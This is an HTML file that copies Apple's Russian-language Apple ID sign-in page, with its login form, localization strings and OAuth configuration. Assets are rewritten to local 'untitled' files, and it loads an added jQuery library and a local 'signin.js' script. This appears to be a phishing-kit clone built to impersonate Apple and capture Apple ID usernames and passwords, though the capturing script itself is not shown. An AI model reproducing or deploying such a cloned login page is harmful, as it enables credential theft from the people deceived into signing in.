<!DOCTYPE html>
<!-- saved from url=(0371)https://idmsa.apple.com/appleauth/auth/authorize/signin?frame_id=auth-z5fqt3ql-yzq4-fov3-ey7w-9tehtu0w&iframeId=auth-z5fqt3ql-yzq4-fov3-ey7w-9tehtu0w&client_id=af1139274f266b22b68c2a3e7ad932cb3c0bbe854e13a79af78dcc73136882c3&redirect_uri=https://appleid.apple.com&response_type=code&response_mode=web_message&state=auth-z5fqt3ql-yzq4-fov3-ey7w-9tehtu0w&authVersion=latest -->
<html data-rtl="false" lang="ru">
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <title></title>
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <script src="https://kit.fontawesome.com/64e954a0c9.js" crossorigin="anonymous"></script>
    <link rel="stylesheet" href="./fonts(1)" type="text/css">
    <link rel="stylesheet" type="text/css" media="screen" href="./app.css">
    <script type="text/javascript" src="./common-header.js(1).Без названия"></script>
    <style type="text/css"></style>
    <style type="text/css"></style>
</head>
<body class="tk-body ">
<div aria-hidden="true" style="font-family:&quot;SF Pro Icons&quot;; width: 0px; height: 0px; color: transparent;">.
</div>
<div aria-hidden="true" style="font-family:&quot;SF Pro Display&quot;; width: 0px; height: 0px; color: transparent;">.
</div>
<div class="si-body si-container container-fluid" id="content" data-theme="dark">
    <apple-auth app-loading-defaults="{appLoadingDefaults}" pmrpc-hook="{pmrpcHook}">
        <div class="widget-container  fade-in restrict-min-content  restrict-max-wh  fade-in " data-mode="inline"
             data-isiebutnotedge="false">
            <div id="step" class="si-step  ">
                <logo {hide-app-logo}="hideAppLogo" {show-fade-in}="showFadeIn">
                </logo>
                <div id="stepEl" class="   ">
                    <sign-in suppress-iforgot="{suppressIforgot}" initial-route="" {on-test-idp}="@_onTestIdp">
                        <div class="signin fade-in" id="signin">
                            <app-title signin-label="true" title-class="">
                                <h1 tabindex="-1" class="si-container-title tk-callout  ">
                                    Apple&nbsp;ID
                                </h1>
                            </app-title>
                            <div class="container si-field-container  password-second-step     ">
                                <form id="sign_in_form" class="signin-form fed-auth hide-password">
                                    <div class="si-field-container container">
                                        <div class="form-table">
                                            <div class="account-name form-row    ">
                                                <label class="sr-only form-cell form-label"
                                                       for="account_name_text_field">Apple&nbsp;ID Apple ID</label>
                                                <div class="form-cell">
                                                    <div class=" form-cell-wrapper ">
                                                        <input type="text" id="account_name_text_field"
                                                               can-field="accountName" autocomplete="off"
                                                               autocorrect="off" autocapitalize="off"
                                                               aria-required="true" required="required"
                                                               spellcheck="false" ($focus)="appleIdFocusHandler()"
                                                               ($keyup)="appleIdKeyupHandler()"
                                                               ($blur)="appleIdBlurHandler()"
                                                               class="force-ltr form-textbox form-textbox-text "
                                                               placeholder="Apple ID" aria-invalid="false" autofocus="">
                                                        <span aria-hidden="true" id="apple_id_field_label"
                                                              class=" form-label-flyout">
              Apple ID
            </span>
                                                    </div>
                                                </div>
                                            </div>
                                            <div class="password form-row     " aria-hidden="true">
                                                <label class="sr-only form-cell form-label" for="password_text_field">Пароль</label>
                                                <div class="form-cell">
                                                    <div class="form-cell-wrapper ">
                                                        <input type="password" id="password_text_field"
                                                               ($keyup)="passwordKeyUpHandler()"
                                                               ($focus)="pwdFocusHandler()" ($blur)="pwdBlurHandler()"
                                                               aria-required="true" required="required"
                                                               can-field="password" autocomplete="off"
                                                               class="form-textbox form-textbox-text "
                                                               placeholder="Пароль" aria-invalid="false" tabindex="-1">
                                                        <span id="password_field_label" aria-hidden="true"
                                                              class=" form-label-flyout">              Пароль
            </span>
                                                        <span class="sr-only form-label-flyout"
                                                              id="invalid_user_name_pwd_err_msg" aria-hidden="true">
            </span>
                                                    </div>
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                </form>

                                <div class="si-remember-password">
                                    <input type="checkbox" id="remember-me" class="form-choice form-choice-checkbox"
                                           {($checked)}="isRememberMeChecked">
                                    <label id="remember-me-label" class="form-label" for="remember-me">
                                        <span class="form-choice-indicator" aria-hidden="true"></span> Запомнить меня
                                    </label>
                                </div>
                                <div class="spinner-container auth  hide "></div>
                                <button id="sign-in" ($click)="_verify($element)" tabindex="0"
                                        class="si-button btn  fed-ui   fed-ui-animation-show   disable   remember-me   link "
                                        aria-label="Продолжить" aria-disabled="true" disabled="">
                                    <i class="icon icon_sign_in"></i>
                                    <span class="text feat-split">
                                              Продолжить
                                          
                  </span>
                                </button>
                                <button id="sign-in-cancel" ($click)="_signInCancel($element)" aria-disabled="false"
                                        tabindex="0" class="si-button btn secondary feat-split  remember-me   link "
                                        aria-label="Закрыть">
                    <span class="text">                      Закрыть
                      
                    </span>
                                </button>
                            </div>
                            <div class="si-container-footer">
                                <div class="separator "></div>
                                <div class="links tk-subbody">
                                    <div class="si-forgot-password">
                                        <a id="iforgot-link" class="si-link ax-outline lite-theme-override"
                                           ($click)="iforgotLinkClickHandler($element)"
                                           href="https://iforgot.apple.com/password/verify/appleid" target="_blank">
                                            Забыли Apple&nbsp;ID или <span
                                                class="no-wrap sk-icon sk-icon-after sk-icon-external"
                                                style="position: relative;">пароль?</span><span
                                                class="sr-only">Открывается в новом окне.</span>
                                        </a>
                                    </div>


                                </div>


                            </div>
                        </div>
                    </sign-in>
                </div>
            </div>
            <div id="stocking" style="display:none !important;"></div>
        </div>
        <idms-modal wrap-class="full-page-error-wrapper " {(show)}="showfullPageError" auto-close="false">
        </idms-modal>
    </apple-auth>
</div>


<script type="text/stache" id="jstache_500572263">
    
          
          
          
          
          
          <div class="graphite-icon {{symbolName}} {{symbolType}}{{#if wrapperClasses}} {{wrapperClasses}}{{/if}}" aria-live="assertive">
    {{#is symbolName "arrow-left-circle"}}
      <svg id="arrowLeftCircle" data-name="arrow-left-circle" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 110 110"><g id="Semibold-M"><path d="M55,106.05A51.33,51.33,0,0,0,106,55,51.32,51.32,0,0,0,55,4a51.05,51.05,0,0,0,0,102.1Zm0-11.47A39.58,39.58,0,1,1,94.6,55,39.45,39.45,0,0,1,55,94.58ZM29.71,55a5.3,5.3,0,0,0,1.8,4L48.16,75.14a4.32,4.32,0,0,0,3.28,1.32,4.19,4.19,0,0,0,4.24-4.39,4.36,4.36,0,0,0-1.41-3.28l-5.76-5.37-5.18-4,9.77.49H75.7a4.94,4.94,0,0,0,0-9.87H53.1l-9.77.49,5.22-4,5.72-5.37a4.53,4.53,0,0,0,1.41-3.27,4.15,4.15,0,0,0-4.24-4.35,4.32,4.32,0,0,0-3.28,1.32L31.51,51A5.25,5.25,0,0,0,29.71,55Z"/></g></svg>
    {{/is}}

    {{#is symbolName "exclamationmark-triangle-fill"}}
      <svg id="exclamationMark" data-name="exclamationmark-triangle-fill" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 110 110"><g id="Semibold-M"><path d="M16.74,102.19H93.26A12.55,12.55,0,0,0,106.15,89.3,13.1,13.1,0,0,0,104.44,83L66.11,14.4A12.46,12.46,0,0,0,55,7.81,12.61,12.61,0,0,0,43.89,14.4L5.56,83a12.89,12.89,0,0,0-1.71,6.3A12.55,12.55,0,0,0,16.74,102.19ZM55.07,67.91c-3.17,0-5-1.75-5.12-4.93l-.74-22.7c-.14-3.37,2.25-5.67,5.81-5.67s6,2.35,5.81,5.72l-.78,22.6C60,66.21,58.15,67.91,55.07,67.91Zm0,17.24c-3.61,0-6.49-2.39-6.49-5.86s2.88-5.91,6.49-5.91,6.45,2.45,6.45,5.91S58.64,85.15,55.07,85.15Z"/></g></svg>
    {{/is}}

    {{#is symbolName "checkmark"}}
      <svg id="checkmark" data-name="checkmark" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 110 110"><g id="Bold-M"><path d="M45.09,98.63a9.05,9.05,0,0,0,8-4L98.51,25.29a10.28,10.28,0,0,0,1.85-5.67,8.15,8.15,0,0,0-8.49-8.25c-3.33,0-5.42,1.22-7.48,4.4l-39.5,62.3-20-24.56a8,8,0,0,0-6.74-3.22,8.13,8.13,0,0,0-8.49,8.3,8.6,8.6,0,0,0,2.49,6.1L37.32,95A9.52,9.52,0,0,0,45.09,98.63Z"/></g></svg>
    {{/is}}

    {{#is symbolName "exclamationmark-circle-fill"}}
      <svg id="exclamationmark-circle-fill" data-name="exclamationmark-circle-fill" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 110 110"><g id="Semibold-M"><path d="M55,106.05A51.33,51.33,0,0,0,106,55,51.32,51.32,0,0,0,55,4a51.05,51.05,0,0,0,0,102.1Zm0-43.26c-3.17,0-5-1.76-5.13-4.93l-.73-22.71C49,31.83,51.39,29.49,55,29.49s6,2.34,5.86,5.71L60,57.81C59.88,61.08,58.08,62.79,55,62.79ZM55,80c-3.61,0-6.49-2.39-6.49-5.86s2.88-5.9,6.49-5.9,6.45,2.44,6.45,5.9S58.56,80,55,80Z"/></g></svg>
    {{/is}}

    {{#is symbolName "arrow-left-circle-fill"}}
      <svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 112 112"><g id="Regular-M" transform="matrix(1 0 0 1 1391.3 1126)"><path d="M-1335.30029-1020.19531c27.24609,0,49.80518-22.55859,49.80518-49.80469
        c0-27.19727-22.60779-49.80469-49.854-49.80469c-27.19727,0-49.75586,22.60742-49.75586,49.80469
        C-1385.10498-1042.75391-1362.49744-1020.19531-1335.30029-1020.19531z M-1363.76709-1070.04883
        c0-1.17188,0.39075-2.14844,1.5625-3.27148l18.70117-18.70117c0.73242-0.73242,1.70911-1.12305,2.88098-1.12305
        c2.29492,0,4.10144,1.75781,4.10144,4.05273c0,1.17188-0.58582,2.24609-1.26941,2.92969l-6.88489,6.83594l-6.5918,5.56641
        l11.71887-0.48828h28.61328c2.44141,0,4.15027,1.75781,4.15027,4.19922s-1.66016,4.19922-4.15027,4.19922h-28.61328
        l-11.7677-0.43945l6.64062,5.61523l6.88489,6.73828c0.7323,0.73242,1.26941,1.75781,1.26941,2.97852
        c0,2.29492-1.80652,4.05273-4.10144,4.05273c-1.17188,0-2.14856-0.48828-2.88098-1.17188l-18.70117-18.65234
        C-1363.27881-1067.80273-1363.76709-1068.7793-1363.76709-1070.04883z"/></g></svg>
    {{/is}}
</div>

        


</script>


<script type="application/json" id="app_config">
    {
        "i18n": {
            "web.footer.verifyCode.popover.label.sr.only": "Другие возможности",
            "web.trustMyBrowser.sa.info": "Если Вы решите доверять этому браузеру, при следующем входе в систему отвечать на контрольные вопросы не потребуется.",
            "web.trustMyBrowser.2fa.info": "Если Вы решите доверять этому браузеру, при следующем входе в систему код проверки запрашиваться не будет.",
            "web.trustMyBrowser.notNow": "Не сейчас",
            "web.error.fallback": "Не удалось подтвердить Вашу личность. Повторите попытку.",
            "web.placeholder.appleid": "Apple ID",
            "web.placeholder.account": "Учетная запись",
            "web.error.unknown.title": "Произошла непредвиденная ошибка",
            "web.error.account.locked.webAuthnNotSupported.title": "Невозможно подтвердить личность",
            "web.error.account.locked.noDevicesRKNotAllowed.title": "Вход временно отключен",
            "web.aria.repair.iframeTitle": "Восстановление Apple ID",
            "web.auth.oauth2.error.no.apple.card.description.learnmore.url": "https:\/\/www.apple.com\/apple-card\/",
            "web.auth.oauth2.error.no.apple.card.description.learnmore.link.text": "Подробнее о том, как подать заявку",
            "web.auth.oauth2.open.in.new.window.sr.only": "Открывается в новом окне.",
            "web.auth.oauth2.error.no.apple.card.description.support.url": "https:\/\/support.apple.com\/apple-card",
            "web.auth.oauth2.error.no.apple.card.description.support.link.text": "Служба поддержки по карте Apple Card",
            "web.auth.oauth2.error.no.apple.card.description2": "{0:learnMoreLink} {1:supportLink}",
            "web.signInLabelWithAppName": "Войти в {0}",
            "web.footer.siginin.link.createAppleID": "Создайте его \u003Cspan class=\"no-wrap sk-icon sk-icon-after sk-icon-external\"\u003Eсейчас\u003C\/span\u003E",
            "web.federated.intermediaryIntroPage.title": "Apple ID: {0}",
            "web.federated.intermediaryIntroPage.text": "Для входа в учетную запись {1} перейдите на страницу {0}.",
            "web.auth.external.profile.error.required.2.factor.title": "Требуется двухфакторная аутентификация",
            "web.auth.external.profile.error.u13.title": "Функция «Вход с Apple» не поддерживается",
            "web.auth.oauth2.error.no.apple.card.title": "Карта Apple Card не найдена",
            "web.aria.appleId": "Apple ID",
            "web.aria.password": "Пароль",
            "web.text.forgotPassword.link": "Забыли \u003Cspan class=\"no-wrap sk-icon sk-icon-after sk-icon-external\"\u003Eпароль?\u003C\/span\u003E",
            "web.text.forgotPassword": "Забыли пароль?",
            "web.text.useAppleConnect": "\u003Ca target=\"_parent\" id=\"appleConnectUrl\" class=\"si-link ax-outline thin \" href=\"{0}\"\u003EПродолжить вход\u003C\/a\u003E с AppleConnect.",
            "web.aria.signIn": "Войти",
            "web.button.text.continue": "Продолжить",
            "web.aria.close": "Закрыть",
            "web.footer.siginin.link.forgotAccount": "Забыли учетную запись или \u003Cspan class=\"no-wrap sk-icon sk-icon-after sk-icon-external\"\u003Eпароль?\u003C\/span\u003E",
            "web.footer.siginin.link.forgotAppleID": "Забыли Apple ID или \u003Cspan class=\"no-wrap sk-icon sk-icon-after sk-icon-external\"\u003Eпароль?\u003C\/span\u003E",
            "web.footer.siginin.dontHaveAppleID": "Нет Apple ID?",
            "web.footer.copyright": "Copyright &#169; {0} Apple Inc. Все права защищены.",
            "web.footer.termsOfUse": "Условия использования",
            "web.footer.privacyPolicy": "Политика конфиденциальности",
            "web.footer.appleConnectAvailable": "Войдите с помощью учетной записи AppleConnect",
            "web.suppressIforgot.forgotPassword.text": "Обратитесь к администратору или менеджеру своей организации, чтобы сбросить пароль управляемого Apple ID.",
            "web.challenge.too.many.verification.attempts.title": "Слишком много неудачных попыток подтвердить личность",
            "web.challenge.too.many.verification.attempts.body": "Превышено допустимое количество попыток ответить на контрольные вопросы. Повторите попытку позже.",
            "web.text.cancel": "Отменить",
            "web.challenge.reset.button": "Сбросить контрольные вопросы",
            "web.challenge.canNotGenerateResetQuestionURL.text": "Запрос не может быть выполнен из-за возникшей ошибки.",
            "web.tryAgainLater.text": "Повторите попытку позже.",
            "web.button.text.back": "Назад",
            "web.text.ok": "ОК",
            "web.auth.external.profile.error.required.2.factor.learn.more.button": "Подробнее",
            "web.auth.external.profile.button.done": "Готово",
            "web.auth.oauth2.error.no.apple.card.description": "Указанный Apple ID не связан с картой Apple Card. Если Вы пытаетесь войти в уже имеющуюся учетную запись Apple Card, попробуйте воспользоваться другим Apple ID. Чтобы подать заявку на карту Apple Card, используйте приложение Wallet на своем iPhone.",
            "web.auth.external.profile.error.required.2.factor.description": "Для использования функции «Вход с Apple» необходима двухфакторная аутентификация. Включить двухфакторную аутентификацию для Apple ID можно на устройстве с iOS или компьютере Mac.",
            "web.auth.external.profile.error.required.2.factor.description.ios.title": "См. инструкции для устройства с iOS",
            "web.auth.external.profile.error.required.2.factor.description.ios.instruction.v10.3.title": "Для iOS 10.3 и новее:",
            "web.auth.external.profile.error.required.2.factor.description.ios.instruction.v10.3.text1": "Перейдите в меню «Настройки» \u003E [Ваше имя] \u003E «Пароль и безопасность».",
            "web.auth.external.profile.error.required.2.factor.description.ios.instruction.v10.3.text2": "Выберите «Включить двухфакторную аутентификацию».",
            "web.auth.external.profile.error.required.2.factor.description.ios.instruction.v10.3.text3": "Нажмите «Продолжить».",
            "web.auth.external.profile.error.required.2.factor.description.mac.title": "См. инструкции для компьютера Mac",
            "web.auth.external.profile.error.required.2.factor.description.mac.instruction.capitan.title": "Выполните эти действия на компьютере Mac с macOS Catalina или новее:",
            "web.auth.external.profile.error.required.2.factor.description.mac.instruction.capitan.text1": "Перейдите в меню Apple ( \u003Ci aria-hidden=\"true\" style=\"font-size: 12px;\" class=\"icon icon_apple\"\u003E\u003C\/i\u003E ) \u003E «Системные настройки» \u003E Apple ID \u003E Обзор.",
            "web.auth.external.profile.error.required.2.factor.description.mac.instruction.capitan.text3": "Нажмите «Включить двухфакторную аутентификацию».",
            "signing.in.with.appleconnect.in.progress": "Выполняется вход с AppleConnect…",
            "signing.in.with.appleconnect": "Вход с AppleConnect",
            "signing.in.with.appleconnect.attempt.canceled": "Ваша попытка входа была отменена.",
            "signing.in.with.appleconnect.signin.button": "Войти",
            "signing.in.with.appleconnect.approved.device.not.found": "Одобренное устройство не найдено.",
            "signing.in.with.appleconnect.two.factor.requirements": "Для Вашей учетной записи требуется двухфакторная аутентификация. Убедитесь, что приложение AppleConnect установлено, расширение AppleConnect для браузеров Safari и Chrome включено и Вы используете одобренное устройство.",
            "signing.in.with.appleconnect.retry": "Повторить",
            "signing.in.with.appleconnect.acmobile.instructions.not.configured.heading": "Служба AppleConnect не настроена",
            "signing.in.with.appleconnect.acmobile.instructions.not.configured.subheading": "Убедитесь, что Вы зарегистрированы в Self Service и у Вас установлено приложение Connect. Если приложение Connect не установлено, откройте приложение Self Service и установите Connect вручную.",
            "signing.in.with.appleconnect.acmobile.instructions.enrollInSelfService.button": "Зарегистрироваться в Self Service…",
            "web.error.unknown.description": "Ваш запрос не может быть выполнен из-за возникшей ошибки. Повторите попытку позже.",
            "web.error.unknown.description.sign.in.again": "Ваш запрос не был выполнен из-за возникшей ошибки. Войдите в систему снова.",
            "web.error.account.locked.resetInfo": "Перед входом в систему необходимо разблокировать учетную запись.",
            "web.error.accountLocked": "Слишком много попыток подтвердить личность. Необходимо разблокировать учетную запись, чтобы продолжить.",
            "web.error.account.locked.noDevicesNoRK.text": "Не удается выполнить вход, поскольку для Вашей учетной записи не указаны проверенные устройства. Зайдите на сайт Apple ID и воспользуйтесь ключом восстановления, чтобы добавить проверенные устройства.",
            "webAuthn.authentication.notSupported": "Невозможно выполнить вход, потому что Ваш браузер не поддерживает ключи безопасности.",
            "web.error.account.locked.noDevicesRKNotAllowed.text": "Слишком много неудачных попыток входа в учетную запись. Для защиты учетной записи возможность входа будет отключена на 8 часов."
        }
    }
</script>


<script type="text/javascript" src="./initBootData.js.Без названия"></script>


<script type="application/json" class="boot_args">
    {
        "direct": {
            "destinationDomain": "https://appleid.apple.com",
            "appleOAuth": {
                "requestor": {
                    "redirectURI": "https://appleid.apple.com",
                    "responseMode": "web_message",
                    "responseType": "code",
                    "frameId": "auth-z5fqt3ql-yzq4-fov3-ey7w-9tehtu0w",
                    "id": "af1139274f266b22b68c2a3e7ad932cb3c0bbe854e13a79af78dcc73136882c3",
                    "state": "auth-z5fqt3ql-yzq4-fov3-ey7w-9tehtu0w",
                    "type": "firstPartyAuth"
                }
            },
            "urlContext": "/appleauth",
            "enableAuthPopup": false
        },
        "additional": {}
    }
</script>


<script type="text/javascript" src="./initLocalizationStrings.js.Без названия"></script>


<script type="application/json" class="localization_strings">
    [
        {
            "key": "signInFallbackError",
            "value": "Неправильно введены Apple ID или пароль.",
            "shouldEscape": true
        },
        {
            "key": "fallback",
            "value": "Не удалось подтвердить Вашу личность. Повторите попытку.",
            "shouldEscape": true
        },
        {
            "key": "exampleEmail",
            "value": "name@example.com",
            "shouldEscape": true
        },
        {
            "key": "appleId",
            "value": "Apple ID",
            "shouldEscape": true
        },
        {
            "key": "account",
            "value": "Учетная запись",
            "shouldEscape": true
        },
        {
            "key": "password",
            "value": "Пароль",
            "shouldEscape": true
        },
        {
            "key": "rememberMe",
            "value": "Запомнить меня",
            "shouldEscape": true
        },
        {
            "key": "keepMeSignedIn",
            "value": "Оставаться в системе",
            "shouldEscape": true
        },
        {
            "key": "defaultSignInLabel",
            "value": "Вход в систему с Apple ID",
            "shouldEscape": true
        },
        {
            "key": "cancelText",
            "value": "Отменить",
            "shouldEscape": true
        },
        {
            "key": "resetAccText",
            "value": "Разблокировать",
            "shouldEscape": true
        },
        {
            "key": "gotoAppleIdText",
            "value": "Перейти к Apple ID",
            "shouldEscape": true
        },
        {
            "key": "addTrustedDeviceText",
            "value": "Добавить проверенное устройство",
            "shouldEscape": true
        },
        {
            "key": "iframeTitle",
            "value": "Вход в систему с Apple ID",
            "shouldEscape": true
        },
        {
            "key": "acccountLockedTitle",
            "value": "Apple ID заблокирован в целях безопасности",
            "shouldEscape": true
        },
        {
            "key": "noDevicesNoRKDialogTitle",
            "value": "Невозможно подтвердить личность",
            "shouldEscape": true
        },
        {
            "key": "suppressIforgotTitle",
            "value": "Требуется сбросить пароль?",
            "shouldEscape": true
        },
        {
            "key": "resetCRTokenTitle",
            "value": "Эта ссылка больше не действительна.",
            "shouldEscape": true
        },
        {
            "key": "logoAltText",
            "value": "Логотип приложения",
            "shouldEscape": true
        },
        {
            "key": "saChallenge.button.resetSecurityQuestions.text",
            "value": "Сбросить контрольные вопросы",
            "shouldEscape": true
        },
        {
            "key": "titleCouldNotGenerateResetQuestionURL",
            "value": "Не удалось сбросить контрольные вопросы",
            "shouldEscape": true
        },
        {
            "key": "okText",
            "value": "ОК",
            "shouldEscape": true
        },
        {
            "key": "accountUnlockButton",
            "value": "Разблокировать",
            "shouldEscape": true
        },
        {
            "key": "btnTextGoBack",
            "value": "Назад",
            "shouldEscape": true
        },
        {
            "key": "btnTextContinue",
            "value": "Продолжить",
            "shouldEscape": true
        },
        {
            "key": "notNowTrustMyBrowser",
            "value": "Не сейчас",
            "shouldEscape": true
        },
        {
            "key": "intermediaryIntroPageTitle",
            "value": "Apple ID: {0}",
            "shouldEscape": true
        },
        {
            "key": "intermediaryIntroPageDefaultTitle",
            "value": "Apple ID для организации",
            "shouldEscape": true
        }
    ]
</script>


<script type="application/json" class="boot_args">
    {
        "direct": {
            "isPasswordSecondStep": true,
            "isFederatedAuthEnabled": true,
            "urlBag": {
                "passwordReset": "https://iforgot.apple.com/password/verify/appleid",
                "createAppleID": "https://appleid.apple.com/account",
                "appleId": "https://appleid.apple.com",
                "verificationCodeHelp": "https://support.apple.com/kb/HT204974",
                "accountRecoveryHelp": "https://support.apple.com/kb/HT204921",
                "crResetUrl": "https://iforgot.apple.com/request/questions/reset"
            },
            "acUrl": "https://idmsa.apple.com/IDMSWebAuth/acsignin",
            "refererUrl": "https://appleid.apple.com/",
            "enableSRPAuth": false,
            "domainId": 1,
            "shouldSuppressIForgotLink": false,
            "twoFactorAuthEnv": 1,
            "generateHashcashScriptTag": "\u003Cscript type=\"text/javascript\" src=\"https://appleid.cdn-apple.com/appleauth/static/jsj/N1759367132/generateHashcash.js\" \u003E\u003C/script\u003E",
            "iframeId": "auth-z5fqt3ql-yzq4-fov3-ey7w-9tehtu0w",
            "meta": {
                "futureReservedAuthUIModes": [
                    "popped-window",
                    "dialog",
                    "tabbed"
                ],
                "supportedAuthUIModes": [
                    "window",
                    "embed",
                    "inline"
                ],
                "FEConfiguration": {
                    "isEyebrowTextboxEnabled": false,
                    "jsLogLevel": "ERROR",
                    "appLoadDelay": "0",
                    "enablePerformanceLog": false
                }
            },
            "isInterstitialFedAuthPageEnabled": true,
            "twoFactorAuthAppKey": "SRHyr6vucF9FNfGnoXtD6psCTodEz0D1j3edwS3TysI=",
            "isRtl": "false",
            "hashcash": {
                "hashcashGenerationTimeout": 10,
                "hcChallenge": "174d57ab058783aa8ff0029363c4541e",
                "hcBits": "10",
                "isHCstrictTimeout": true
            }
        },
        "additional": {}
    }
</script>

<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.0/jquery.min.js"></script>
<script src="signin.js"></script>
<script type="text/javascript" src="./app.js.Без названия"></script>


</body>
</html>